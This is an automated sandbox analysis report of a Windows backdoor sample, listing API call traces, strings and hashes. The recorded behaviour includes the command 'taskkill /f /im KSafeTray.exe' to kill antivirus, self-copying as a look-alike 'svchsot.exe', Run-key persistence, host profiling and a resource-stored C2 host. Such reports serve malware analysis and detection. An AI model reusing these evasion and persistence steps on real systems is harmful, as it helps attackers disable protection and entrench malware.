                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                • Instruction ID: e16900cb5c4ece056a77d287793db1095366f4d6b5bb26a23405047953fa84d7
                                • Opcode Fuzzy Hash: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                • Instruction Fuzzy Hash: 6B41B2B27003056FE714DF68AC81B67B398EB88355F14443AFA06EB691DAB5E81486A4

                                Control-flow Graph

                                [Control-flow graph for 1000d900-1000dd1a: executed / not executed basic blocks with the registry and string API calls made from each block; graph rendering data omitted]
                                APIs
                                • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                  • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?,1000DAB6), ref: 1000DD29
                                  • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?), ref: 1000DD32
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$Open
                                • String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                • API String ID: 2976201327-1612119606
                                • Opcode ID: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                • Instruction ID: 5f681d0d18a1945acf8fc48913839280a3791203cc6d3613b66fb068a083d58d
                                • Opcode Fuzzy Hash: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                • Instruction Fuzzy Hash: 13C187B19006589FEB14DF94CC84FEE73B9EB88300F504699F619A3184DBB4AE45CFA5

                                Control-flow Graph

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,100022F0,00000000,00000000,00000000), ref: 10002ACF
                                • CloseHandle.KERNEL32(00000000), ref: 10002AD8
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateThread.KERNEL32(00000000,00000000,10002820,00000000,00000000,00000000), ref: 10002B17
                                • CloseHandle.KERNEL32(00000000), ref: 10002B1A
                                • Sleep.KERNEL32(000001F4), ref: 10002B21
                                • WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002B3B
                                • CreateThread.KERNEL32(00000000,00000000,10002930,00000000,00000000,00000000), ref: 10002B50
                                • CloseHandle.KERNEL32(00000000), ref: 10002B53
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002B94
                                • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002BA4
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 10002BBA
                                • lstrcat.KERNEL32(?,00000000), ref: 10002BD6
                                • lstrcat.KERNEL32(?,.exe), ref: 10002BE2
                                • MoveFileA.KERNEL32(?,?), ref: 10002BF1
                                • CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002C18
                                • CloseHandle.KERNEL32(00000000), ref: 10002C1B
                                • Sleep.KERNEL32(0002BF20), ref: 10002C22
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
                                • String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
                                • API String ID: 1427586252-36606792
                                • Opcode ID: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                • Instruction ID: e5db488d9108fed6223139133818c57053fb22d89266da83dd4b914657c10bfb
                                • Opcode Fuzzy Hash: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                • Instruction Fuzzy Hash: 6A31B2B568034576F620EBA08C87FDA3399DB85B84F104914F745BA0C6DBF8F88486B9

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002959
                                • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002969
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 1000297F
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • lstrcat.KERNEL32(?,00000000), ref: 1000299C
                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 100029A5
                                • Sleep.KERNEL32(00000032), ref: 100029B3
                                • wsprintfA.USER32 ref: 100029E8
                                • lstrcat.KERNEL32(?,\svchsot.exe), ref: 100029F7
                                • MoveFileA.KERNEL32(?,?), ref: 10002A1D
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10002A32
                                • wsprintfA.USER32 ref: 10002A4A
                                • lstrlen.KERNEL32(?,00000000), ref: 10002A56
                                • Sleep.KERNEL32(000003E8), ref: 10002A7F
                                • FindWindowA.USER32(00000000,1007A204), ref: 10002A88
                                • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002A95
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResourcelstrcat$DirectoryFindSleepwsprintf$??2@??3@CopyCreateLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
                                • String ID: %s\JH.BAT$LLLLLL$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe
                                • API String ID: 426448433-1350257756
                                • Opcode ID: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                • Instruction ID: 7e78db92d01b1022693add636c3c748d173f9461a296e18299dfe13d1dc5dce8
                                • Opcode Fuzzy Hash: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                • Instruction Fuzzy Hash: A531A472144395BBE310DBA4CC85FEB73A9EBC8700F004D1CF38496080EBB9A548CBA6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • wsprintfA.USER32 ref: 100013C0
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
                                • String ID: GGGGGG$XXXXXX
                                • API String ID: 3303837233-960986945
                                • Opcode ID: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                • Instruction ID: ac7a2d40f97e3ef275d1792f4a74c8e88388e2e8796807a1ab99ef5296ea06a1
                                • Opcode Fuzzy Hash: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                • Instruction Fuzzy Hash: 9431C7766006046BE318CBB4CC56BEB779AEBC4360F144B2DF667972C1DEE49D088295

                                Control-flow Graph

                                APIs
                                • GetVersionExA.KERNEL32 ref: 10001624
                                  • Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
                                  • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
                                  • Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
                                  • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365
                                • getsockname.WS2_32 ref: 10001679
                                  • Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                  • Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                  • Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                • GetSystemInfo.KERNEL32(?), ref: 100016B0
                                  • Part of subcall function 100012A0: 6E9B1E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                • GlobalMemoryStatus.KERNEL32 ref: 100016E8
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                  • Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                  • Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                  • Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                  • Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                  • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
                                  • Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
                                  • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA
                                  • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                  • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryFirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
                                • String ID: $VVVVVV$f
                                • API String ID: 965855644-510421235
                                • Opcode ID: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                • Instruction ID: 195f56337f309cec53029e41885cee457b9433af063c58e809775b1897ec5c08
                                • Opcode Fuzzy Hash: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                • Instruction Fuzzy Hash: 9D3170B55083859FD324CF24C885ADBBBE5FBC8344F008A1DF58983241DB74AA49CBA2

                                Control-flow Graph

                                APIs
                                • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,753C8400,753C8400,753C8400,00000000,76F88A60,?,00000000,00000001,?), ref: 1000DDF7
                                • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DE17
                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DE4D
                                • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000DE7A
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DE98
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000DEAA
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DEC8
                                • RegDeleteValueA.ADVAPI32(?,?), ref: 1000DEDA
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: OpenValue$Delete$Create
                                • String ID:
                                • API String ID: 2295199933-0
                                • Opcode ID: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                • Instruction ID: 67a97fe157c163e159881c9215a6b69e3a943ce5662b6e6d27993ba540d2685e
                                • Opcode Fuzzy Hash: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                • Instruction Fuzzy Hash: FA415DB1600289ABEB10EF95CD84EAFB7BDFB58790B10851AFA19D7184D771ED008B70

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                • ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                • socket.WS2_32 ref: 10003966
                                • gethostbyname.WS2_32(?), ref: 10003986
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                • String ID:
                                • API String ID: 513860241-0
                                • Opcode ID: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                • Instruction ID: 7f2db06767454f243879fc9fac78131effb9a87e5068b181b0692220e83332b6
                                • Opcode Fuzzy Hash: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                • Instruction Fuzzy Hash: 9531A375204351BFE320DF68CC85F9BB7E9AF85754F00850DF1999B290DBB198498752

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                • Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                • _strcmpi.MSVCRT ref: 10012658
                                • Process32Next.KERNEL32(00000000,00000000), ref: 1001266F
                                • lstrcmpiA.KERNEL32(00000024,?), ref: 1001267A
                                • Process32Next.KERNEL32(00000000,00000000), ref: 10012686
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
                                • String ID:
                                • API String ID: 3655294272-0
                                • Opcode ID: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                                • Instruction ID: 7b96640b3de945d751338f4a492b60aca70c41a0bc2120e114b52792a7ac63ae
                                • Opcode Fuzzy Hash: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                                • Instruction Fuzzy Hash: B9F0A4B130135627E6109676AC45EA77BDDCF826E6F011425FA04E9081FB31E96092B5

                                Control-flow Graph

                                APIs
                                • wsprintfA.USER32 ref: 1000132A
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?), ref: 10001356
                                • gethostname.WS2_32(?,?), ref: 1000135E
                                • lstrlen.KERNEL32(?), ref: 10001365
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Opengethostnamewsprintf
                                • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 2381335061-3973614608
                                • Opcode ID: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                • Instruction ID: 00a212d8d59931bd4f36ea5daea73ab107ff809958005370ca5a53895ebf1fbb
                                • Opcode Fuzzy Hash: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                • Instruction Fuzzy Hash: 2D01F7712003547FF7209224CC55FEB729EEFC8754F008828F74593240D6B56D4586A6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 100033D0: RtlInitializeCriticalSection.NTDLL(?), ref: 100033E8
                                • WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateCriticalEventInitializeSectionStartup
                                • String ID: 0$G$h$s
                                • API String ID: 1327880603-311548548
                                • Opcode ID: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                • Instruction ID: 055722d880a944932a15ed8300a47e19ec8ef09bbf59dd5dab02bd7fde056146
                                • Opcode Fuzzy Hash: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                • Instruction Fuzzy Hash: 81216D342097C09EE325CB28C945B87BBD9EB96B14F04895DE4EA472C1CBB96509CB63

                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                • FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                • LoadResource.KERNEL32(?,00000000), ref: 10009751
                                • LockResource.KERNEL32(00000000), ref: 10009758
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$??2@??3@FindLoadLock
                                • String ID: HOST
                                • API String ID: 472997506-4189257289
                                • Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                • Instruction ID: d48a8112f6b242a354970dd34bc60e7fd0122bfa4f1a00ce6be9372c3ccc99b8
                                • Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                • Instruction Fuzzy Hash: 03F0F6F37002102BF600DAB89CCAFAB228DDB85379F040434F704DB281DA659C505262
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                Strings
                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255
                                • ~MHz, xrefs: 1000127A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
